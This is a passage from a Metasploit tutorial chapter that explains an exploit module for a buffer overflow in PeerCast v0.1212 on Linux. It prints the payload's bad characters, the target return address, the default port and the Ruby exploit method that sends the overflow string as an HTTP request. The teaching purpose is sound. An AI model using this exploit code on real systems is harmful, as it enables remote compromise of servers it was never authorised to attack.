'Payload' =>
{
'Space' => 200,
'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
'MinNops' => 64,
},
NOTE These bad characters make sense in this context of a URL-based
exploit. They include the NULL termination character, line-feed, carriagereturn,
the space character, /, =, and ;.
Chapter 4: Using Metasploit
99
PART II
After the payload information comes the target information. This exploit targets
Linux systems running one specific version of PeerCast (v0.1212), and includes the
return address for that version.
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Targets' =>
[['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7
}],],
The final bit of initialization information is the set of default variables. PeerCast
Streaming Server by default runs on 7144/tcp, so the exploit by default sets RPORT
to 7144.
register_options( [ Opt::RPORT(7144) ], self.class )
Lastly, the module includes the Ruby code to trigger the vulnerability.
def exploit
connect
pat = rand_text_alphanumeric(780)
pat << [target.ret].pack('V')
pat << payload.encoded
uri = '/stream/?' + pat
res = "GET #{uri} HTTP/1.0\r\n\r\n"
print_status("Trying target address 0x%.8x..." % target.ret)
sock.put(res)
handler
disconnect
end
The connection setup is handled by the framework, allowing exploits to include a
simple connect and then focus on the vulnerability.
Pages:
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241